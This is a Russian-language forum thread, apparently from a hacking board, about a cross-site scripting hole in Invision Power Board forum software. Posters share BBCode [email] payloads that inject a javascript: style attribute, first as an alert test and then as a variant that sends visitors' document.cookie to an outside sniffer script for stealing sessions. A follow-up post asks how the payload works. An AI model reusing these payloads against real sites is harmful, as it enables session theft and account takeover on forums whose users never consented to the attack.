Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Межсайтовый скриптинг в Invision Power Board
 
Обсуждение статьи Межсайтовый скриптинг в Invision Power Board
 
(Ya proveril, i naschel chto etot ko rabotaet na VSEH 2.* i na vseh 1.* IPB. )




Код HTML:
[email]wj@wjhttp://www.wj.com`=`.com[/email] ` style=`background:url(javaSCrip t:alert(/wj/))`


Kyki voryem vot tak:


Код HTML:
[email]wj@wjhttp://www.wj.com`=`.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
 
А что надо сделать? Email отправить? Или письмо с данным текстом отправить?
 
Код HTML:
[email]wj@wj (http://www.wj.com`=`).com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Давай проанализируем: зачем нужно wj@wj (http://www.wj.com`=`).com? никак не пойму. Снизу понятно, что сниффер, а сверху? чтоли сайт, который надо атаковать? а мэйл? Обьясните тупому ламеру!
Страницы: 1
Читают тему